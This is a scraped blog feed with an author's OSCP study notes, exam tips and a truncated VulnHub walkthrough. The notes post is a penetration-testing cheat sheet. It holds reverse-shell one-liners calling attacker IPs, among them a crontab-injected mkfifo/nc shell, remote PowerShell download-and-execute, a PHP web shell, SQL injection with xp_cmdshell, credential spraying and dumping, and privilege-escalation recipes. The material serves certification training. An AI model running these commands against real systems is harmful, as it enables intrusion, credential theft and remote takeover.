<p></p></div>Latish Danawalehttp://www.blogger.com/profile/00084840439148244930noreply@blogger.com0tag:blogger.com,1999:blog-1382879664613470931.post-6036388374982472172020-08-14T20:00:00.000-07:002020-08-14T20:00:40.070-07:00OSCP - Personal Notes<p style="text-align: left;"><span style="color: red;"><span style="color: black;"></span></span></p><div class="separator" style="clear: both; text-align: center;"><span style="color: black;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQAuRRjtVwQrYOKmGERiFzaauOgsT6GI8XA7S9_YgjMGFhSSULC6jmQ8XCJlqWvZxG0ZQCMlepG_4fx_-oCKxG6fhLLJMm9gUiaUtVGVdTlKEIMAyYFFq1GqDuu1MicAgB7a83jRgc_M8/s500/unnamed.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a></span></div><div class="separator" style="clear: both; text-align: center;"><span style="color: black;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpnL4tRlEOJpT8zlbWUEm_43ZzjFrXX0Le_EKgZKHXwdVoNDH1aE1dql57AGNwp9jHhStYbLZZG2QdMKPA-42NFnKCAYZe9USmdkAqBVc3eNoMfMJvjMc04BoxgyUvwDlEZUOHlXDRC2g/s500/unnamed.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="414" data-original-width="500" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpnL4tRlEOJpT8zlbWUEm_43ZzjFrXX0Le_EKgZKHXwdVoNDH1aE1dql57AGNwp9jHhStYbLZZG2QdMKPA-42NFnKCAYZe9USmdkAqBVc3eNoMfMJvjMc04BoxgyUvwDlEZUOHlXDRC2g/s0/unnamed.jpg" /></a></span></div><span style="color: black;"> </span><p></p><p style="text-align: left;"><span style="color: red;"><span style="color: black;"><span style="color: #04ff00;">Hey Guys, in this post I am just going to copy paste my notes which I collected during my OSCP journey from different sources. Feel free to collaborate.</span> 💀 </span><br /></span></p><h3 style="text-align: left;"><span style="color: red;">[*] SSH - 22</span></h3><p>Tunneling<br />ssh -L 8443:127.0.0.1:8443 user@x.x.x.x<br /><br />Credentials Spraying<br />ncrack -U users.txt -P pass.txt ssh://x.x.x.x<br /><br /></p><h3 style="text-align: left;"><span style="color: red;">[*] DNS - 53</span></h3><p>Perform DNS Zone Transfer check<br />dig axfr x.x.x.x<br />dig axfr vhost.com @x.x.x.x </p><h3 style="text-align: left;"><span style="color: red;">[*] TCPDUMP</span></h3><p>tcpdump -i eth0 icmp</p><h3 style="text-align: left;"><span style="color: red;">[*] SMB</span></h3><p>1. SMB Protocol enumeration:<br />nmap -p445 --script smb-protocols x.x.x.x<br /><br />2. Check for SMB Vulnerability<br />nmap --script smb-vuln* x.x.x.x<br /><br />3. Get a list of shares available on a host<br />smbclient -L x.x.x.x<br /><br />4. Connect to the share<br />smbclient //x.x.x.x/Share_Name<br /><br />5. SMBMap for checking access on fileshares<br />smbmap -H x.x.x.x -u Username -p Password or smbmap -u '' -p '' -d 'htb.local' -H x.x.x.x<br /><br />6. Download all files in shares:<br />smbget -R smb://x.x.x.x/Share -U Username<br /><br />7. Use crackmapexec for spraying<br />crackmapexec smb 10.10.10.175 -u Users.txt -p Pass.txt --continue-on-success<br /><br />8. Host smbserver by using impacket<br />impacket-smbserver -smb2support htb $(pwd)</p><p>9. Anonymous login and file enumeration using smbmap<br />smbmap -H x.x.x.x -u anonymous -r --depth<span></span><span></span><span></span></p><p></p><h3 style="text-align: left;"><span style="color: red;">[*] LDAP</span></h3><p>1. Basic enumeration<br />ldapsearch -x -h htb.local -b "dc=htb,dc=local"<br /><br />2. Check for Null enumeration<br />ldapsearch -x -h x.x.x.x -D '' -w '' -b "DC=domain,DC=local"<br /><br /></p><h3 style="text-align: left;"><span style="color: red;">[*] File Transfers</span></h3><p>1. certutil<br />certutil -encode file.zip file.b64<br />cat file.b64 | cmd /c C:\windows\temp\nc.exe attacker_IP 4444<br />And locally:<br /><br />nc -lvp 4444 > file.b64 // Remove certificates markers from top and bottom<br />sed -i s/\n//g file.b64 // Remove new line<br />base64 -d file.b64 > file.zip<br /><br />2. certutil -urlcache -split -f http://x.x.x.x/nc.exe C:\\users\public\nc.exe<br /><br />3. (New-Object Net.WebClient).DownloadFile('http://10.10.14.102:8000/test.txt','test.txt') </p><p>4. iwr -uri http://x.x.x.x:8080/nc.exe -outfile /tmp/nc.exe</p><h3 style="text-align: left;"><span style="color: red;">[*] Virtual Host scanning</span></h3><p>https://github.com/codingo/VHostScan<br />VHostScan -t local.domain -w /opt/VHostScan/VHostScan/wordlists/virtual-hostscanning.txt</p><h3 style="text-align: left;"><span style="color: red;">[*] Impacket Script</span></h3><p>1. Get Password Hash of User Accounts:<br />python3 GetNPUsers.py local.domain/ -dc-ip 10.10.10.175 -request -usersfile = To provide users<br /><br />later use below command to crack the password:<br />hashcat -m 18200 -a 0 Hash.txt /usr/share/wordlists/rockyou.txt --force<br /><br />2. Enumerate Domain Users<br />python3 GetADUsers.py -all local.domain/User -dc-ip x.x.x.x</p><p>3. Use this script to check if any user is vulnerable to kerberoasting.<br />GetUserSPNs.py -request -dc-ip x.x.x.x local.domain/user</p><p><br /></p><h3 style="text-align: left;"><span style="color: red;">[*] MSSQL - 1433</span></h3><p>1. Use Impacket script - mssqlclient.py for login<br />mssqlclient.py user@x.x.x.x -windows-auth<br /><br />2. Use xp_dirtree "\\x.x.x.x\doesntexist" for getting a User Hash on Responder.<br /></p><h3 style="text-align: left;"><span style="color: red;">[*] Oracle - 1521</span></h3><p>Use ODAT tool for attacking database<br />https://github.com/quentinhardy/odat</p><p><br /></p><h3 style="text-align: left;"><span style="color: red;">[*] Redis - 6379</span></h3><p>nmap --script redis-info -sV -p 6379 x.x.x.x<br />Either upload a webshell or ssh keys and get access to the box.<br />https://book.hacktricks.xyz/pentesting/6379-pentesting-redis</p><p></p><h3 style="text-align: left;"><span style="color: red;">[*] Windows - Privilege Escalation Quick Wins!<br /></span></h3><p>1. CHM Priv escalation<br />https://www.youtube.com/watch?v=k7gD4ufex9Q<br />https://gist.github.com/mgeeky/cce31c8602a144d8f2172a73d510e0e7<br /><br />2. SAM & SYSTEM<br />If we are able to dump both SAM & SYSTEM file, then use following command to dump<br />hashes out of it.<br />impacket-secretdump -sam SAM -system SYSTEM local<br />Then PASS-THE-HASH to tools like smbmap or psexec<br /><br />3. Juicy Potato<br />Doesn't work on Win10 and Win2019<br />whoami /priv to check for following privileges:<br />• SeImpersonatePrivilege<br />• SeAssignPrimaryPrivilege<br />• SeTcbPrivilege<br />• SeBackupPrivilege<br />• SeRestorePrivilege<br />• SeCreateTokenPrivilege<br />• SeLoadDriverPrivilege<br />• SeTakeOwnershipPrivilege<br />• SeDebugPrivilege<br />https://github.com/ohpe/juicy-potato<br /><br />Run<br />cmd juicypotato.exe -t * -p “Program to launch” -l 9001<br />Reference Machine - Conceal HTB<br /><br />4. GPP Password<br />Use PowerUP.ps1 in order to extract Group Policy Passwords<br /><br />5. Procdump<br />Dump process of services running like browsers in order to extract credentials.<br /><br />6. Kerberoasting by using GetUserSPNs.py Impacket Script<br />Use this script to check if any user is vulnerable to kerberoasting.<br />GetUserSPNs.py -request -dc-ip x.x.x.x domain.htb/user<br /><br />7. Exploiting “runas /savecred"<br />Use cmdkey /list to check for stored credentials.<br />$WScript = New-Object -ComObject Wscript.Shell<br />$shortcut = Get-ChildItem shortcut.lnk<br />$shortcut<br />$Wscript.CreateShortcut($shortcut)<br /><br />8. Use Mimikatz<br />Tips:<br />i. If it is getting block by group policy, search for Applocker Bypass list.<br />https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-<br />AppLockerbypasses.md<br /><br />ii. If this list didn't work then go for meterpreter by using Unicorn.<br />python unicorn.py windows/meterpreter/reverse_http LHOST LPORT<br />It will generate 2 files:<br />a. powershell_attack.txt - save it as msf.ps1<br />b. unicorn.rc - use this to load msfconsole (msfconsole -r unicorn.rc)<br />Download and run msf.ps1 on Target machine.<br /><br />iii. If unicorn is not working then go for Empire.<br />Reference Machine - Access HTB machine <br /><br />9. DPAPI<br />Download masterkey file: c:\users\localuser\appdata\Roaming\Microsoft\Protect\x-x-x-xxxxx-<br />xxxxxx\<br />Download Credential file: C:\users\localuser\appdata\Roaming\Microsoft\Credentials\<br /><br />Then on your local machine run following command on mimikatz to get a masterkey:<br />mimikatz# dpapi::masterkey /in:file /sid:sid-of-current-user /password:password-ofcurrent-user<br /><br />It will give you masterkey then run following command to get a cleartext password.<br />mimikatz# dpapi::cred /in:Credentials-filemimikatz# dpapi::cred /in:Credentials-file<br /> </p><p>10. ADRecyclebin Deleted Objects Recover<br />Use below command:<br />Get-ADObject -filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -<br />includeDeletedObjects -property *<br /><br />Reference link: https://www.poweradmin.com/blog/restoring-deleted-objects-fromactive-<br />directory-using-ad-recycle-bin/<br /><br />11. AutoLogon Credentials Reuse<br />After running PowerUp we may end up getting AutoLogon creds which we cn use for<br />escalating privileges<br /><br />$passwd = ConvertTo-SecureString ‘PasswordofAdmin’ -AsPlainText -Force<br />$creds = New-Object System.Management.Automation.PSCredential('administrator' $passwd)<br /><br />A reverse shell can now be opened with the supplied creds using following command:<br />Start-Process -FilePath “powershell” -argumentlist “IEX(New-Object Net.WebClient).downloadString('http://x.x.x.x/InvokePowershellTCP.ps1')” -Credential $creds<br /><br />12. Use cacls<br />To check Access Control:<br />Get-ACL file.txt | fl *<br />This will allow full access to file if use is a owner of the file.<br />cacls root.txt /t /e /p User:F<br /><br />13. Perform Pass the Hash using pth-winexe<br />pth-winexe -U jeeves/Administrator%NLTMHash //ServerIP cmd<br /><br />14. MS14-680<br />https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek<br />Reference Machine - Mantis<br /><br />15. APLC Task Scheduler LPE<br />https://nvd.nist.gov/vuln/detail/CVE-2018-8440<br />In order to run this exploit we should have READ EXECUTE Access to Authenticated<br />Users<br />icacls c:\Windows\Tasks folder<br />Machine Reference - Conceal</p><h3 style="text-align: left;"><span style="color: red;">[*] Linux - Privilege Escalation Quick Wins!</span></h3><p>1. SSH Files found:<br />if id_rsa file found then use ssh2john.py to crack the encypted password.<br />chmod 400 id_rsa<br />ssh -i id_rsa user@x.x.x.x<br /><br />2. Look for services running locally which are not exposed to the public and to tunnel<br />them to your box.<br /><br />3. Create SSH keys:<br />This will create user.pub and user file<br />ssh-keygen -f user<br />chmod 600 user.pub<br />ssh -i user localuser@x.x.x.x<br /><br />4. Screen 4.5.0 Local Priv Esc<br />https://www.exploit-db.com/exploits/41154<br /><br />5. Use sudo -l to check what commads/ script we can execute as a root user.<br /><br />6. Redhat/CentOS root through network-scripts<br />Command execution by simply providing input space command in the script.<br />https://seclists.org/fulldisclosure/2019/Apr/24<br />Reference Machine - Networked HTB<br /><br />7. Vault taken<br />https://www.vaultproject.io/docs/concepts/tokens.html<br />Reference Machine - Craft HTB<br /><br />8. Logstash input as a command<br />Reference machine - Haystack<br /><br />9. SystemCTL SUID exploitation<br /><br />10. PATH Hijacking using pspy<br />To check which group our user belongs to groups<br />To find out files and folders owned by group<br />find / -group group_name 2>/dev/null<br />echo $PATH.<br />Reference Machine - WriteUp HTB<br /><br />12. Vim<br />sudo /usr/bin/vi /var/www/html/anyfilewhichwecanaccessasaroot -c ‘:!/bin/bash’<br /><br />13. Priv Esc via LXD<br />https://reboare.github.io/lxd/lxd-escape.html<br />lxc init ubuntu:16.04 blah -c security.privileged=true<br />lxc config device add blah root disk source=/ path=/mnt/root recursive=true<br />Steps:<br />i. Create a alpine build locally.<br />Link: https://github.com/saghul/lxd-alpine-builder<br />ii. Transfer tar.gz file on remote machine.<br />scp yourfile.tar.gz user@x.x.x.x:<br />iii. Import image in the lxc<br />lxc image import yourfile.tar.gz alpine # if this doesn't work run<br />lxc image import yourfile.tar.gz --alias alpine<br />iv. Check if it is imported or not by using<br />lxc image list<br />v. Now create a machine<br />lxc init alpine privesc -c security.privileged=true<br />vi. lxc list to view machine<br />vii. Mount hard drive to the machine<br />lxc config device add privesc host-root disk source=/ path=/mnt/root/<br />viii. Start the container<br />lxc start privesc<br />ix. lxc exec privesc /bin/sh<br />Reference Machine - Calamity<br /><br />14. Module Hijacking<br />If abc.py script is importing some module from def.py and if we have write access to<br />def.py we can perform a Module Hijacking.<br />example,<br />shell = ‘’'<br />* * * * * root rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|n<br />10.10.14.111 4444 >/tmp/f<br />‘’'<br />f =open('/etc/crontab, ‘a’)<br />f.write(shell)<br />f.close()<br /><br />15. Inspecting Mozilla Firefox Profile<br />Check for .mozilla folder.<br />Gain saved crdentials using tools like<br />firefox_decrypt - https://github.com/unode/firefox_decrypt<br />firepwd - https://github.com/lclevy/firepwd<br />Transfer files as<br />cd /tmp<br />zip -r mozilla.zip ~/.mozilla<br />nc x.x.x.x 1234 < mozilla.zip<br /><br />16. Linux Capabilities<br />For the purpose of performing permission checks, traditional UNIX implementations <br />distinguish two categories of processes: privileged processes (whose effective user ID<br />is 0, referred to as superuser or root) & unprivileged processes (whose effective UID is<br />nonzero). Privileged processes bypass all kernel permission checks, while<br />unprivileged processes are subject to full permission checking based on the process's<br />credentials (usually: effective UID, effective GID, and supplementary group list).<br /><br />How to detect:<br />getcap -r / 2>/dev/null<br />If you find ep (effective and permitted) binary<br />then go to gtfobins and exploit it.<br />example,<br />https://gtfobins.github.io/gtfobins/openssl/#file-read<br />With File Read Write ability, modify sudoers<br />Reference Machine - Lightweight HTB<br /><br />17. PostgreSQL, PAM and NSS<br />Enumerate for Passwords under a web directory /var/www/html:<br />grep -R password<br />https://serverfault.com/questions/538383/understand-pam-and-nss/538503#538503<br />Reference Machine - RedCross HTB <br /><br />18. H2 Database<br />https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html<br />H2 is an open source database management system written in Java. Curl is used to<br />verify that the login page is accessible internally.<br />curl -g -6 ‘http://[::1]:8002'<br />ps aux | grep h2 # To detect H2 DBMS version<br /><br />19. Docker Privileges<br />id # Check if current user belongs to docker group<br />docker images --all # Reveals available images on the system.<br />docker run --rm -v /:/hostOS -t1 imageonbox sh<br /><br />20. Homer - Apache CouchDB<br />Exploit: https://www.exploit-db.com/exploits/44913<br />Explanation: https://justi.cz/security/2017/11/14/couchdb-rce-npm.html<br />How to detect by running following command:<br />ps aux<br /></p><h3 style="text-align: left;"><span style="color: red;">[*] LFI & RFI Scenario</span></h3><p>1. If LFI found on system try to fetch common windows file like<br />/windows/system32/license.rtf<br />/windows/pather/unattend.xml<br /><br />2. In case if you are not getting anything sensitive information or not able to exploit it,<br />go for RFI by hosting a local SMB server and confirm it by running nc on 445 eg.<br />http://example.php?file=\\10.10.14.111\htb\file.txt<br />nc -lvnp 445<br />If receive hits on nc it means it is vulnerable to RFI.<br /><br />3. Also run responder and try to get a NTLMv2 hash<br />responder -I eth0<br /><br />4. Use tcpdump to verify<br />tcpdump -i eth0 port 445<br /></p><h3 style="text-align: left;"><span style="color: red;">[*] RCE Scenario</span></h3><p>1. Use nishang's Invoke-PowerShellTcp.ps1<br /><br />2. If it is not working then check if powershell CONSTRAINED MODE by using<br />following command.<br />powershell.exe $ExecutionContext.SessionState.LanguageMode<br /><br />3. In such a scenario we can drop nc on server via our locally hosted smb server and get a reverse connection.<br />\\10.10.14.111\htb\nc.exe 10.10.14.111 9001 -e powershell<br />Also we can drop nc.exe by using following command:<br />powershell (New-Object Net.WebClient).downloadString('http://x.x.x.x/nc.exe') or can<br />also use IWR<br />powershell IWR -uri http://x.x.x.x/nc.exe -OutFile C:\\Windows\\Temp\\nc.exe<br />cmd /c c:\\windows\\Temp\\nc.exe x.x.x.x 9001 -e powershell.exe<br />Also we can use below command:<br />powershell wget “http://x.x.x.x/nc.exe” -outfile “nc.exe”<br />nc.exe -e cmd.exe x.x.x.x 1234<br /></p><h3 style="text-align: left;"><span style="color: red;">[*] SQL Injection Scenario</span></h3><p>1. Use EXEC xpcmdshell to execute a command via SQL Injection and try to steal a<br />hash using responder.<br />id=1;EXEC xp_cmdshell whoami; --<br />or<br />id=1;declare @q varchar(200);set @q='\\x.x.x.x\localshare';exec<br />master.dbo.xp_dirtress @q; --+</p><p>2. Use into outfile to write a content in it.<br />http://x.x.x.x/test.php?id=-1 union select 1,lod_file('/etc/passwd'),3,4,5 into outfile ‘/var/<br />www/html/test.txt’<br />After that visit http://x.x.x.x/test.txt<br />Also check default 000-default.conf which is under /etc/apache2/sites-enabled/000-<br />dafeult-conf<br />also one can achieve a web shell by injection a php file:<br /><?php system($_REQUEST["exec"]);?><br /></p><h3 style="text-align: left;"><span style="color: red;">[*] LFI to RCE<br /></span></h3><p>https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-canlead-to-severe-RCE-vulnerabilities.html<br />https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/ </p><h3 style="text-align: left;"><span style="color: red;">[*] Reverse Connection Issues</span></h3><p>1. If reverse shell dies instantly use following command to check if any sort of intrusion<br />system is present on the box.<br />find /home -ctime -60 # It will giv all files modified in last 60 minutes on box<br />In such scenario cp /bin/nc to /dev/shm/newname - rewrite nc to newfile name<br />and try to execute the nc command again.<br /><br />2. Try listening on port 80 or 443.<br /></p><h3 style="text-align: left;"><span style="color: red;">[*] Spawn TTY</span></h3><p>1. python3 -c 'import pty; pty.spawn("/bin/sh")'<br />2. echo os.system('/bin/bash')<br />3. /bin/sh -i<br />4. perl —e 'exec "/bin/sh";'<br />5. ruby: exec "/bin/sh"<br />6. lua: os.execute('/bin/sh')<br />7. (From within IRB)<br />exec "/bin/sh"<br />8. (From within vi)<br />:!bash<br />9. (From within vi)<br />:set shell=/bin/bash:shell<br />10. (From within nmap)<br />!sh<br /></p><p><br /></p><p><br /></p>Latish Danawalehttp://www.blogger.com/profile/00084840439148244930noreply@blogger.com2tag:blogger.com,1999:blog-1382879664613470931.post-27317559587452408882020-08-13T11:47:00.004-07:002020-08-13T12:01:26.224-07:00OSCP - Tips for Beginners!<p>On 9th August 2020, I received a confirmation mail from Offensive Security that I successfully clear my exam and I am now an OSCP! </p><div class="separator" style="clear: both; text-align: left;"> </div><div class="separator" style="clear: both; text-align: left;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1j5JbWkl4FPt6JTEDr1spb_5rVhx1guELPguBVcRkNZjmd9HlseBDfyDOdP5JnumoDUwmKga_5nmCFFVjwdYtz5R6HOVXOpjNLVGCrFSd82RfnZtrUepaqO3dhvxn6YUgEkW2RhgIKvw/s777/0.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="254" data-original-width="777" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1j5JbWkl4FPt6JTEDr1spb_5rVhx1guELPguBVcRkNZjmd9HlseBDfyDOdP5JnumoDUwmKga_5nmCFFVjwdYtz5R6HOVXOpjNLVGCrFSd82RfnZtrUepaqO3dhvxn6YUgEkW2RhgIKvw/s640/0.jpg" width="640" /></a></div> </div><div class="separator" style="clear: both; text-align: left;">After posting this on Linkedin, I got tons of messages from people asking me about tips and what are my thoughts on OSCP exam. So, in this post I'll be sharing my notes as well as few important takeaways which I feel it will help every beginner just like me! 😄 </div><div class="separator" style="clear: both; text-align: left;"> </div><div class="separator" style="clear: both; text-align: left;">Tips #1:</div><div class="separator" style="clear: both; text-align: left;">Always read more writeups! I know, it's a common suggestion that every other OSCP will give but believe me it will work!.</div><div class="separator" style="clear: both; text-align: left;"> </div><div class="separator" style="clear: both; text-align: left;">Tip #2:</div><div class="separator" style="clear: both; text-align: left;">Follow the legendary <a href="https://twitter.com/ippsec">Ippsec</a>. On his Youtube channel you will get to learn a lot of techniques. Only watching his video won't help, so make proper notes.<br /></div><div class="separator" style="clear: both; text-align: left;">Link: <a href="https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA">https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA</a> </div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">Tip #3:</div><div class="separator" style="clear: both; text-align: left;">Practice, Practice and Practice! </div><div class="separator" style="clear: both; text-align: left;">OSCP labs + HTB + Vulnhub would be enough.</div><div class="separator" style="clear: both; text-align: left;">(I also bought HTB VIP subscription just to practice more on retired boxes) </div><div class="separator" style="clear: both; text-align: left;"> </div><div class="separator" style="clear: both; text-align: left;">Tip #4:</div><div class="separator" style="clear: both; text-align: left;">Before my exam, I watched <a href="https://twitter.com/_johnhammond">John Hammond</a>'s video and he gave one very useful advice.</div><div class="separator" style="clear: both; text-align: left;">"Try harder mantra won't work every time, so take a break, refresh your mind and then again Try harder!"</div><div class="separator" style="clear: both; text-align: left;">Link: <a href="https://www.youtube.com/watch?v=kdobdnQ2sGw&t=456s">https://www.youtube.com/watch?v=kdobdnQ2sGw&t=456s</a></div><div class="separator" style="clear: both; text-align: left;">As exam is for 24 hours so it's very important to take breaks frequently otherwise you will get exhausted.</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">Tip #5:</div><div class="separator" style="clear: both; text-align: left;">Confused when it come's to Buffer Overflow? Well, follow <a href="https://twitter.com/thecybermentor">Cyber Mentor'</a>s BoF series and I <span><span data-dobid="hdw">guarantee you that it's one of the best tutorials for BoF!<br /></span></span></div><div class="separator" style="clear: both; text-align: left;">Link: <a href="https://www.youtube.com/watch?v=qSnPayW6F7U&list=PLLKT__MCUeix3O0DPbmuaRuR_4Hxo4m3G">https://www.youtube.com/watch?v=qSnPayW6F7U&list=PLLKT__MCUeix3O0DPbmuaRuR_4Hxo4m3G</a><br /></div><div class="separator" style="clear: both; text-align: left;"> </div><div class="separator" style="clear: both; text-align: left;">Tip #6:</div><div class="separator" style="clear: both; text-align: left;">I know Privilege Escalation is a nightmare as a beginner, the most common tools which helped me are as follows:</div><div class="separator" style="clear: both; text-align: left;">Windows: <a href="https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite">https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite</a></div><div class="separator" style="clear: both; text-align: left;">Linux: <a href="https://github.com/rebootuser/LinEnum">https://github.com/rebootuser/LinEnum</a> <br /></div><div class="separator" style="clear: both; text-align: left;"> <br /></div><div class="separator" style="clear: both; text-align: left;">Tip #7:</div><div class="separator" style="clear: both; text-align: left;">While exploitation if you find any suspicious technique/ technology/ software/ binary. Simply use <a href="https://ippsec.rocks/">https://ippsec.rocks/</a> to search for. 99% of time it gave me accurate results.</div><div class="separator" style="clear: both; text-align: left;"> </div><div class="separator" style="clear: both; text-align: left;">Tip #8:</div><div class="separator" style="clear: both; text-align: left;">OSCP Exam is all about <b>TIME MANAGEMENT, </b>so make sure you spend enough time on the respective machine depending upon the marks allocation. If you get stuck then make a note and go ahead for another machine. </div><div class="separator" style="clear: both; text-align: left;"> </div><div class="separator" style="clear: both; text-align: left;">Tip #9:</div><div class="separator" style="clear: both; text-align: left;">During your exam, make sure you scan your target machines properly. As this scan results you are going to refer for next 24 hours so make sure they are perfect.<br /></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">Tip #10:</div><div class="separator" style="clear: both; text-align: left;">After compromising your target, it is very important that you collect necessary evidences like taking POC of local.txt, proof.txt etc. </div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">Tip #11:</div><div class="separator" style="clear: both; text-align: left;">Reporting is very important part, as it reflects how exactly you compromised your target so make sure you have all the necessary POCs and use a nice template. I'll recommend use following one:</div><div class="separator" style="clear: both; text-align: left;"><a href="https://github.com/whoisflynn/OSCP-Exam-Report-Template">https://github.com/whoisflynn/OSCP-Exam-Report-Template</a></div><div class="separator" style="clear: both; text-align: left;"> </div><div class="separator" style="clear: both; text-align: left;">Tip #12:</div><div class="separator" style="clear: both; text-align: left;">Last but not least, if you fail in your 1st attempt don't feel demotivated. OSCP is just an exam, it's not like an end of the world. So chill and introspect yourself and identify where things got wrong. </div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">I hope so this tips will help you guys for your OSCP journey. If you like this post share it with your friends!</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">Happy Hacking 😊<br /></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"> </div><div class="separator" style="clear: both; text-align: left;"> <br /></div><div class="separator" style="clear: both; text-align: left;"> </div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"> </div><div class="separator" style="clear: both; text-align: center;"> </div>Latish Danawalehttp://www.blogger.com/profile/00084840439148244930noreply@blogger.com1tag:blogger.com,1999:blog-1382879664613470931.post-63109067661252833812020-08-07T09:03:00.001-07:002020-08-07T09:03:43.837-07:00OSCP Giveaway Challenge - Writeup<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdtdBtL74vPfF_7vxraZESCRRjJn4HB-SATD2ejJewFDUvpkuVGuRDGlwwalwmrwZlhdvfA_wLdgRjulw-heZraLfgj0dv0G-iAwIGNDI3t0YWLkH2ImeB0rMYboXmxROwxYvlFwB5UME/s649/oscp.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="438" data-original-width="649" height="277" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdtdBtL74vPfF_7vxraZESCRRjJn4HB-SATD2ejJewFDUvpkuVGuRDGlwwalwmrwZlhdvfA_wLdgRjulw-heZraLfgj0dv0G-iAwIGNDI3t0YWLkH2ImeB0rMYboXmxROwxYvlFwB5UME/w410-h277/oscp.png" width="410" /></a></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div>On 4th August, I received a message from my mentor <a href="https://twitter.com/TanoyBose" target="_blank">Tanoy</a> that Offensive Security is doing giveaway for OSCP voucher. But in order to participate in the giveaway, participants have to pwn a box on vulhub.com and submit the root flag on discord server.</div><div><br /></div><div>So I thought let's give a try and to be honest it was a pretty easy box 😊. You can download the machine from the below link:</div><div><a href="https://www.vulnhub.com/entry/infosec-prep-oscp,508">https://www.vulnhub.com/entry/infosec-prep-oscp,508</a></div><div><br /></div><div>Download the VM and get the IP. In my case it was 10.0.2.10</div><div><br /></div><div><i><b>Steps:</b></i></div><div><br /></div><div>1. Start with nmap scan. After doing scan we noticed that port 22 and 80 are open. <br /></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJeJe04xclSvCLxLxLoJNVCpKzPu64v-IJferPxSaqoaSnhzSHg7hDjLNpXfLvCa_yT4DUi8iQ90xQ19EWL7u4H55pBmePbi0i-2bvSCNGtw-TBNWm4G1CvX4i2vpSxKNZL44mczbXJ70/s1076/nmap.PNG" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="440" data-original-width="1076" height="328" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJeJe04xclSvCLxLxLoJNVCpKzPu64v-IJferPxSaqoaSnhzSHg7hDjLNpXfLvCa_yT4DUi8iQ90xQ19EWL7u4H55pBmePbi0i-2bvSCNGtw-TBNWm4G1CvX4i2vpSxKNZL44mczbXJ70/w800-h328/nmap.PNG" width="800" /></a></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div>2. Nmap scan reveals /secret.txt file present on the web server. After visiting the file we got some base64 encoded data.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_d6GKgZgpG9W5yJvRXSMF0rZoobyI4VlcdAbSr4eLCBuHxA5bIJ0iZpMaj1KteQBoalBsqQgixxhoaQfkRzm9Jbn06CDvjGcDcRlYkLAwupfIVRnOpyLBjR91wBNMElm3ycS6FzK47UM/s800/base64+data.PNG" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="800" data-original-width="623" height="800" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_d6GKgZgpG9W5yJvRXSMF0rZoobyI4VlcdAbSr4eLCBuHxA5bIJ0iZpMaj1KteQBoalBsqQgixxhoaQfkRzm9Jbn06CDvjGcDcRlYkLAwupfIVRnOpyLBjR91wBNMElm3ycS6FzK47UM/w623-h800/base64+data.PNG" width="623" /></a></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div>3. Decode 